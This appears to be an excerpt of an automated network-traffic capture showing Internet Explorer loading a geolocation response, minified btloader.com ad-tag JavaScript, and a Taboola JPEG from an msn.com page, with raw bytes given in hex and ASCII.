                                                2021-09-10 09:28:19 UTC0INData Raw: 6a 73 6f 6e 46 65 65 64 28 7b 22 63 6f 75 6e 74 72 79 22 3a 22 43 48 22 2c 22 73 74 61 74 65 22 3a 22 5a 48 22 2c 22 73 74 61 74 65 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 63 6f 64 65 22 3a 22 38 31 35 32 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 34 33 30 30 30 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 35 37 31 38 30 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 45 55 22 7d 29 3b
                                                Data Ascii: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.549782104.26.7.139443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-09-10 09:28:20 UTC0OUTGET /tag?o=6208086025961472&upapi=true HTTP/1.1
                                                Accept: application/javascript, */*;q=0.8
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: btloader.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:20 UTC1INHTTP/1.1 200 OK
                                                Date: Fri, 10 Sep 2021 09:28:20 GMT
                                                Content-Type: application/javascript
                                                Content-Length: 10055
                                                Connection: close
                                                Access-Control-Allow-Origin: *
                                                Cache-Control: public, max-age=1800, must-revalidate
                                                Etag: "9e65f2af141ca0a7e5ebc06696b0cdb5"
                                                Vary: Origin
                                                Via: 1.1 google
                                                CF-Cache-Status: HIT
                                                Age: 1211
                                                Accept-Ranges: bytes
                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6wvi%2FaU8O7s3HWgmF0z7xeUjzmMf%2FTvU48hNC93EFPTm7iXMN%2FDaIpY4EAu8MxNzOTqdEEGRyQIzkpsAGI4E46%2FOBkl3puLIifpPbwFUiTP0sMMa0Qyixp1uL5OJ5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 68c7a0266e9e4e80-FRA
                                                2021-09-10 09:28:20 UTC1INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 69 2c 63 2c 6c 29 7b 72 65 74 75 72 6e 20 6e 65 77 28 63 3d 63 7c 7c 50 72 6f 6d 69 73 65 29 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 74 72 79 7b 72 28 6c 2e 6e 65 78 74 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 74 72 79 7b 72 28 6c 2e 74 68 72 6f 77 28 65 29 29 7d 63 61 74 63 68 28 65 29 7b 74 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6e 28 65 2e 76 61 6c 75 65 29 3a 28 28 74 3d 65 2e 76 61 6c 75 65 29 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 74 3a 6e 65 77 20 63 28 66 75 6e 63 74 69 6f
                                                Data Ascii: !function(){"use strict";function r(e,i,c,l){return new(c=c||Promise)(function(n,t){function o(e){try{r(l.next(e))}catch(e){t(e)}}function a(e){try{r(l.throw(e))}catch(e){t(e)}}function r(e){var t;e.done?n(e.value):((t=e.value)instanceof c?t:new c(functio
                                                2021-09-10 09:28:20 UTC2INData Raw: 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 63 3b 29 74 72 79 7b 69 66 28 61 3d 31 2c 72 26 26 28 69 3d 32 26 74 5b 30 5d 3f 72 2e 72 65 74 75 72 6e 3a 74 5b 30 5d 3f 72 2e 74 68 72 6f 77 7c 7c 28 28 69 3d 72 2e 72 65 74 75 72 6e 29 26 26 69 2e 63 61 6c 6c 28 72 29 2c 30 29 3a 72 2e 6e 65 78 74 29 26 26 21 28 69 3d 69 2e 63 61 6c 6c 28 72 2c 74 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 69 3b 73 77 69 74 63 68 28 72 3d 30 2c 69 26 26 28 74 3d 5b 32 26 74 5b 30 5d 2c 69 2e
                                                Data Ascii: (t){return function(e){return function(t){if(a)throw new TypeError("Generator is already executing.");for(;c;)try{if(a=1,r&&(i=2&t[0]?r.return:t[0]?r.throw||((i=r.return)&&i.call(r),0):r.next)&&!(i=i.call(r,t[1])).done)return i;switch(r=0,i&&(t=[2&t[0],i.
                                                2021-09-10 09:28:20 UTC3INData Raw: 79 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 76 61 72 20 75 2c 61 2c 64 2c 62 2c 6d 3b 75 3d 22 36 32 30 38 30 38 36 30 32 35 39 36 31 34 37 32 22 2c 61 3d 22 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 64 3d 22 61 70 69 2e 62 74 6c 6f 61 64 65 72 2e 63 6f 6d 22 2c 62 3d 22 32 2e 30 2d 34 2d 67 33 36 37 63 35 37 65 22 2c 6d 3d 22 22 3b 76 61 72 20 6f 3d 7b 22 6d 73 6e 2e 63 6f 6d 22 3a 7b 22 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 77 65 62 73 69 74 65 5f 69 64 22 3a 22 35 36 37 31 37 33 37 33 38 38 36 39 35 35 35 32 22 7d 7d
                                                Data Ascii: y||window.document.documentElement).appendChild(e)})}var u,a,d,b,m;u="6208086025961472",a="btloader.com",d="api.btloader.com",b="2.0-4-g367c57e",m="";var o={"msn.com":{"content_enabled":true,"mobile_content_enabled":false,"website_id":"5671737388695552"}}
                                                2021-09-10 09:28:20 UTC5INData Raw: 65 78 4f 66 28 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 26 26 28 74 3d 21 30 2c 77 2e 77 65 62 73 69 74 65 49 44 3d 6f 5b 6e 5d 2e 77 65 62 73 69 74 65 5f 69 64 2c 77 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 2c 77 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6f 5b 6e 5d 2e 6d 6f 62 69 6c 65 5f 63 6f 6e 74 65 6e 74 5f 65 6e 61 62 6c 65 64 29 3b 74 7c 7c 28 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 2f 2f 22 2b 64 2b 22 2f 6c 3f 65 76 65 6e 74 3d 75 6e 6b 6e 6f 77 6e 44 6f 6d 61 69 6e 26 6f 72 67 3d 22 2b 75 2b 22 26 64 6f 6d 61 69 6e 3d 22 2b 65 29 7d 28 29 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a 75 2c 64 6f 6d 61
                                                Data Ascii: exOf(n.toLowerCase()))&&(t=!0,w.websiteID=o[n].website_id,w.contentEnabled=o[n].content_enabled,w.mobileContentEnabled=o[n].mobile_content_enabled);t||((new Image).src="//"+d+"/l?event=unknownDomain&org="+u+"&domain="+e)}(),window.__bt_tag_d={orgID:u,doma
                                                2021-09-10 09:28:20 UTC6INData Raw: 63 26 26 63 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 6c 3d 6e 2c 73 3d 31 2d 6e 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 63 2e 62 75 6e 64 6c 65 73 29 2e 73 6f 72 74 28 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 2e 62 75 6e 64 6c 65 73 5b 65 5d 3b 72 5b 65 5d 3d 7b 6d 69 6e 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 6c 2b 73 2a 6f 29 29 2c 6d 61 78 3a 4d 61 74 68 2e 74 72 75 6e 63 28 31 30 30 2a 28 6c 2b 73 2a 28 6f 2b 74 29 29 29 7d 2c 6f 2b 3d 74 7d 29 7d 76 61 72 20 75 3d 74 5b 65 5d 3b 69 66 28 6e 75 6c 6c 21 3d 75 26 26 75 2e 62 75 6e 64 6c 65 73 29 7b 76 61 72 20 64 3d 6e 2b 28 31 2d 6e 29 2a 6f 2c 62 3d 28 31 2d 6e 29 2a 28 31 2d 6f 29 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 75 2e 62 75 6e 64 6c 65
                                                Data Ascii: c&&c.bundles){var l=n,s=1-n;Object.keys(c.bundles).sort().forEach(function(e){var t=c.bundles[e];r[e]={min:Math.trunc(100*(l+s*o)),max:Math.trunc(100*(l+s*(o+t)))},o+=t})}var u=t[e];if(null!=u&&u.bundles){var d=n+(1-n)*o,b=(1-n)*(1-o);Object.keys(u.bundle
                                                2021-09-10 09:28:20 UTC7INData Raw: 74 22 3a 35 37 31 30 31 35 30 38 35 32 36 37 33 35 33 36 2c 22 62 75 6e 64 6c 65 73 22 3a 7b 22 35 37 31 30 31 35 30 38 35 32 36 37 33 35 33 36 22 3a 31 7d 7d 7d 2c 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 69 6e 74 72 6e 6c 3d 7b 74 72 61 63 65 49 44 3a 70 2e 74 72 61 63 65 49 44 7d 3b 74 72 79 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 6e 2c 6f 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 61 6c 72 65 61 64 79 5f 69 6e 76 6f 6b 65 64 7c 7c 21 77 2e 77 65 62 73 69 74 65 49 44 3f 5b 32 5d 3a 28
                                                Data Ascii: t":5710150852673536,"bundles":{"5710150852673536":1}}},window.__bt_intrnl={traceID:p.traceID};try{!function(){r(this,void 0,void 0,function(){var t,n,o;return i(this,function(e){switch(e.label){case 0:return window.__bt_already_invoked||!w.websiteID?[2]:(
                                                2021-09-10 09:28:20 UTC9INData Raw: 7c 77 2e 6d 6f 62 69 6c 65 43 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 29 2c 77 2e 77 65 62 73 69 74 65 49 44 26 26 77 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 26 26 28 21 28 6e 3d 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69 65 6d 6f 62 69 6c 65 7c 69 70 28 68 6f 6e 65 7c 6f 64 29 7c 69 72 69 73 7c 6b 69 6e 64 6c 65 7c 6c 67 65 20 7c 6d 61 65 6d 6f 7c 6d 69 64 70 7c 6d 6d 70 7c 6d 6f 62 69 6c 65 2e 2b 66 69 72 65 66 6f 78 7c 6e 65 74 66 72 6f 6e 74 7c 6f 70 65 72 61 20 6d 28 6f 62 7c 69 6e 29 69 7c 70 61 6c 6d 28 20 6f 73
                                                Data Ascii: |w.mobileContentEnabled),w.websiteID&&w.contentEnabled&&(!(n=/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os
                                                2021-09-10 09:28:20 UTC10INData Raw: 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c 72 74 7c 73 65 29 7c 70 72 6f 78 7c 70 73 69 6f 7c 70 74 5c 2d 67 7c 71 61 5c 2d 61 7c 71 63 28 30 37 7c 31 32 7c 32 31 7c 33 32 7c 36 30 7c 5c 2d 5b 32 2d 37 5d 7c 69 5c 2d 29 7c 71 74 65 6b 7c 72 33 38 30 7c 72 36 30 30 7c 72 61 6b 73 7c 72 69 6d 39 7c 72 6f 28 76 65 7c 7a 6f 29 7c 73 35 35 5c 2f 7c
                                                Data Ascii: )|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.549816151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-09-10 09:28:24 UTC11OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fimages.maennersache.de%2Fkunde-will-150-packungen-klopapier-umtauschen-john-paul-drake%2Cid%3D73f41081%2Cb%3Dmaennersache%2Cw%3D1600%2Crm%3Dsk.jpeg HTTP/1.1
                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC13INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 33310
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 472892736572853848016818289116622835340,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "d6ad21bee6a9518a4eff957695ef06c8"
                                                last-modified: Fri, 13 Aug 2021 07:45:15 GMT
                                                status: 200 OK
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 100
                                                x-ratelimit-reset: 1
                                                x-request-id: 3e3a648c4b850acdc2c9021f884eeb16
                                                x-envoy-upstream-service-time: 22
                                                X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb804
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 1471129
                                                X-Served-By: cache-wdc5552-WDC, cache-dca17772-DCA, cache-hhn4029-HHN
                                                X-Cache: HIT, HIT, HIT
                                                X-Cache-Hits: 1, 1, 1
                                                X-Timer: S1631266105.681016,VS0,VE1
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fimages.maennersache.de%2Fkunde-will-150-packungen-klopapier-umtauschen-john-paul-drake%2Cid%3D73f41081%2Cb%3Dmaennersache%2Cw%3D1600%2Crm%3Dsk.jpeg
                                                X-vcl-time-ms: 1
                                                2021-09-10 09:28:24 UTC14INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 06 06 06 07 07 06 09 0a 09 0a 09 0d 0c 0b 0b 0c 0d 14 0e 0f 0e 0f 0e 14 1f 13 16 13 13 16 13 1f 1b 21 1b 19 1b 21 1b 31 26 22 22 26 31 38 2f 2d 2f 38 44 3d 3d 44 56 51 56 70 70 96 01 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 36 00 00 02 03 01 01 01 01 01 00 00 00 00 00 00 00 00 05 06 03 04 07 02 01 08 00 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 00 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 78 b5 4f 31 d2 ca 0b 8f b3 ed 84 97
                                                Data Ascii: JFIF!!1&""&18/-/8D==DVQVpp++&.%#%.&D5//5DNB>BN_UU_wqw76xO1
                                                2021-09-10 09:28:24 UTC15INData Raw: b4 75 9c fb cc e0 eb 5c 35 d6 e5 e0 7a c8 5f cf aa 6e 8e 55 98 e7 ac 10 1d 3a c2 e5 1a dd df 17 2c ea cd b1 e3 e1 16 e8 19 da d9 a2 a3 e4 9b e1 d0 96 a1 99 af a6 53 bc d2 93 a1 55 ea 3e 9b 1d 71 20 16 d5 1d 1a b6 88 7a db 79 f4 58 83 b8 b8 9d a9 ea 60 e1 80 eb 46 0d 07 97 a5 ea 78 7f 74 b1 99 57 6a 34 da 72 a9 a9 4d 6a 9d e3 fc fb 70 49 12 cb 5a e6 81 93 b9 a4 9a 0f da a2 95 68 83 d9 5b 47 9d d3 cf ef 67 28 b7 42 11 99 11 a1 e0 bf d8 b1 44 5b 75 b9 fa 5d af 34 d9 a9 e6 e3 b3 4d fb 3f 70 8d 7b 36 3b ae b5 5e 84 ce 27 fc dc b5 5a 61 26 64 d9 d4 33 7d 58 ba a9 d5 ed e6 e9 57 a8 67 0a b4 9f 6d 2d 7e 73 5e 25 1e 53 b3 51 51 b3 15 5d 9b e6 8d 61 b8 7a 5e 87 9b a2 c9 91 56 86 18 cf 9c f7 9b 50 58 4a af 4f 33 c5 83 bf 9a f6 ab fe 89 bc 0d d5 70 fd f5 10 b2 6d be
                                                Data Ascii: u\5z_nU:,SU>q zyX`FxtWj4rMjpIZh[Gg(BD[u]4M?p{6;^'Za&d3}XWgm-~s^%SQQ]az^VPXJO3pm
                                                2021-09-10 09:28:24 UTC17INData Raw: 8d b4 27 4b 82 4f e3 ef a1 ad d1 32 d8 7e 7a 2d 69 37 a0 4a fa d1 5c c6 fd a6 1b b6 9a 9c ff 00 03 b7 66 9f 70 f9 d1 c6 73 ea ec 67 8f a1 36 73 78 bf ab 26 d2 15 24 02 2d bf 98 fc a4 b4 df 51 c7 fe 7d ea 32 cb 82 6a a5 c5 a2 87 ca d0 86 46 2c 54 61 51 db eb 85 07 4e 9c be ab ad a6 ab 9a 29 5e f3 a9 ca af fb 23 74 57 6f 02 00 a5 d8 1c d2 00 31 c5 8d 32 d2 be be 31 e0 26 8a b0 03 da 7f 79 a5 4b d9 40 49 db 16 5c e0 0e f4 0f 00 2b 36 08 13 a2 70 23 b8 e4 77 14 30 c4 2c 1b 82 16 2b 46 7b fc a9 00 d6 15 17 fa b2 eb 81 b0 ce 6e d2 c9 a5 a7 c6 74 cd 69 c0 d4 0b 9c 34 62 af f4 22 8e ff 00 09 ad a6 8e 64 51 85 f1 30 f3 b0 2f 89 6f 06 3f d9 a3 35 4f 21 84 73 4c 9a f2 e6 09 f1 f9 47 15 a5 9c ca e9 9e 17 53 a1 40 e3 e6 74 65 50 ac 80 da 1e 66 60 eb 21 42 8c 99 3a cf
                                                Data Ascii: 'KO2~z-i7J\fpsg6sx&$-Q}2jF,TaQN)^#tWo121&yK@I\+6p#w0,+F{nti4b"dQ0/o?5O!sLGS@tePf`!B:
                                                2021-09-10 09:28:24 UTC18INData Raw: 99 3c 16 7f ca 73 e5 ee da f4 b8 06 9e 61 f6 5c 57 2e ed c4 17 61 cd 32 9c c3 7e 8d d0 0a 9e ad 15 60 cb 95 51 95 d4 b6 6b 28 4e 19 19 0b 7f 1f e2 1b f9 f9 c3 8a 61 26 1c b0 df 0f df d0 e6 92 d6 6e 22 56 14 4f 8c 44 59 42 52 7c b2 67 d3 d4 ec 55 58 e1 14 3d 4b 49 18 da 90 58 d4 90 d7 f1 d9 fd 13 6d 6f 7d e5 ee 1c 45 5c a5 78 e7 cc d6 41 a5 e3 a4 6a 40 cb f7 36 0d 2a 0d 21 cd e4 1a 19 82 2c fa 4d 9d 1e 55 3f 6e 1b 99 77 bc 9a 14 c8 ad cd 5f be df 3d 2e b8 5d d1 d0 d2 bd 3e 66 71 e1 2c 62 c9 26 22 c8 0d d1 8c 64 75 17 53 bc ae da d8 e7 39 95 b2 b0 76 66 16 34 2a bf 97 19 2c 33 d2 91 ce ff 00 23 98 94 cd 6b 79 0b c1 48 9e cd 13 39 e7 8a d7 8f 20 cb 90 9f c0 ae b8 b0 3a 40 aa 43 3a 6a 8d 71 5b ea 68 ad 57 3a e6 05 46 cd 87 ab bb 71 cf fc 2f 1a b1 6a 55 de af
                                                Data Ascii: <sa\W.a2~`Qk(Na&n"VODYBR|gUX=KIXmo}E\xAj@6*!,MU?nw_=.]>fq,b&"duS9vf4*,3#kyH9 :@C:jq[hW:Fq/jU
                                                2021-09-10 09:28:24 UTC20INData Raw: 12 94 6b 0a 6e 6a 83 af d1 c7 19 14 79 dd 1f cb 3b be ae 3c d4 1f d2 d3 d6 63 f6 75 1f 19 bf df b9 cf 47 36 ca 5c ee 39 81 86 ce e3 8e 9d a3 f2 4e 4d 35 93 2d a3 75 76 cd d0 bb 28 aa 93 16 ce 1e 42 07 45 be 43 a5 d1 35 06 c5 01 cf ea 66 fb 08 49 61 d6 d1 4b 7c 47 31 5b 47 f8 f2 7d 00 72 72 74 80 66 5a 2f ef 27 56 84 74 47 9e d0 0c 72 95 1e 0f 6c ba 20 62 b9 9d 30 1a e6 a0 b7 a7 2b c9 e7 e1 12 88 74 1a 48 7e 28 16 4a a9 f5 48 e3 e8 6a 67 bc cb 4b 30 1f 32 f0 21 0b c3 2c 37 d0 74 c8 73 eb 84 f7 3d ff 00 2b 72 31 49 f9 79 a3 f9 9a 62 b7 a6 4e 56 87 6d bf ad 33 fc 86 b0 cb 04 15 ca b8 a5 ef 75 8f b6 89 a6 07 be 98 fd 98 cb 06 32 df 33 d3 3d 26 f4 da 87 c8 64 18 a8 c6 b0 be 08 72 b8 59 65 3b 92 5d 22 ac c5 49 1a af 73 d5 61 fb 2f 48 cf 69 88 55 62 1d b3 6a 77
                                                Data Ascii: knjy;<cuG6\9NM5-uv(BEC5fIaK|G1[G}rrtfZ/'VtGrl b0+tH~(JHjgK02!,7ts=+r1IybNVm3u23=&drYe;]"Isa/HiUbjw
                                                2021-09-10 09:28:24 UTC21INData Raw: 22 a7 37 39 d9 ea f3 ce 02 95 8c 0e 2b f9 ec 97 d2 73 9b df e5 f4 79 ac fc c5 f6 37 b9 ce cf a8 ca 02 38 9c e5 01 c9 6f 76 d5 29 fb 0f c8 6f bf ca 70 5d ae 3b 1c 0e ab dd 5f 59 bc 0b 16 99 d1 cc 16 70 09 be 33 f4 3d 01 f4 6c 3b 65 0d 7e 70 0b ef 60 9d a6 ac 4a 53 d7 af 17 a5 fd 41 89 0e 5e ea ba 42 8e f2 4a 1a 9f 3a c7 e0 94 1a 3b 5d 63 94 8d 7d 2e 3b 9c ce 06 fe e0 fa 5f c8 7b fd 74 7d 55 f0 22 18 29 1f 01 41 7d f8 39 a8 af 36 91 58 15 8a 41 40 58 38 6a 58 a5 ec 4a 14 e4 0a cb f9 97 cb f3 a2 c7 06 49 14 2f e1 51 00 b6 f7 b6 1e 13 86 ce 2d 99 d5 20 b7 31 b2 6b 61 61 e2 33 bb a6 c7 bb 19 9e bb f9 5d 59 03 f6 b4 87 27 95 ce c8 d1 c5 de 74 da 9d 79 ca 0c d4 72 f9 0c 82 e3 b8 ad 14 c8 da 51 1c 95 e4 aa 62 66 13 63 0c 2b e9 3c 25 e3 43 f1 ec 7f d5 f9 07 4e 84
                                                Data Ascii: "79+sy78ov)op];_Yp3=l;e~p`JSA^BJ:;]c}.;_{t}U")A}96XA@X8jXJI/Q- 1kaa3]Y'tyrQbfc+<%CN
                                                2021-09-10 09:28:24 UTC22INData Raw: a8 c4 05 6f 5f ef c5 01 17 9f 76 f3 9e b1 f7 76 f5 7a 8b 48 eb 5a 45 a2 9e 6c 67 66 68 a8 29 d9 23 96 5b 3f 4e 5a 6f 54 ba 01 fb db 8a 66 3f 76 e9 09 69 51 db e8 85 9d 09 d1 07 8a 20 b1 4f b4 bc 57 17 e8 d2 02 e6 62 58 57 4d 9e 42 f5 ab 6e 3d 85 7d 5c a1 e7 ad a2 e1 9c 67 43 31 32 c5 bf af 5e 47 f5 1e 56 be 08 33 6f 73 e3 0c 56 49 e8 5e 72 6d 97 4f 42 8b bd a3 03 9f 7e 7c 3d f9 70 41 7d 7f 6a 8c 8c 96 17 9a 20 28 dc ea 0e d7 a1 2d ee 7d cf 96 fa c3 f1 af ae d0 af 03 14 2a d6 e2 41 5c 7c d5 94 19 6f d4 9f 44 f7 4b 94 cd 27 31 96 ad 2d af da 6c 46 76 7f 43 6b c7 33 ca 6a 72 e3 c1 9b 59 8b 9c 8b 13 44 c5 33 c0 a9 1d d2 1b ea 67 e3 68 27 57 31 34 29 e7 36 e3 59 64 75 20 87 49 5d 87 77 ba 30 54 56 b5 50 cd b1 4d e3 9a 9e b4 81 4c d2 56 9e 50 36 b4 f9 73 00 31
                                                Data Ascii: o_vvzHZElgfh)#[?NZoTf?viQ OWbXWMBn=}\gC12^GV3osVI^rmOB~|=pA}j (-}*A\|oDK'1-lFvCk3jrYD3gh'W14)6Ydu I]w0TVPMLVP6s1
                                                2021-09-10 09:28:24 UTC24INData Raw: 00 8d 28 f9 54 37 3d 5e 48 4d bf f3 e0 d0 31 3b 1c e4 0f 0f 4b 27 51 10 71 17 5e 94 de 59 41 2a 6a 59 ba af a2 91 8e a3 38 3c f2 c6 37 2a 58 7e b9 ab cb 6b 77 96 39 ee 2e 38 10 b8 08 a4 64 e0 9a bf b8 8a 79 c4 9c 8e 04 4a a0 23 65 b2 2a c7 a6 5c a1 57 9b 2b 9c 11 83 ba bc bf 90 03 1a 44 63 4d 8f 50 90 49 c5 43 39 e2 88 d7 46 35 52 4e 81 3b 3e 75 57 73 5d 43 14 82 28 59 b9 9e 2e aa 7d bc 52 a4 d2 02 cb 6c 63 5e 64 85 66 ce 2b ee b2 72 c6 74 54 e7 7d b3 4d 15 db 43 14 4c bc 95 34 b4 2c 24 c0 3c 80 24 6f 54 3a 63 83 cc 1c 7b d2 db ba ae 54 10 4f 73 9a e1 29 50 a7 18 d5 0b 48 94 96 60 b4 2d 39 27 25 6c 0f 71 ba f4 02 ae 06 35 4a 87 fa d6 84 2c 3b d1 53 d8 63 f5 35 e9 b0 ef 8a 2a 49 27 5a af 52 35 27 94 d1 8a 92 7b 55 1e a1 95 4e 3c 81 9a 37 d6 e7 96 3d 46 c2
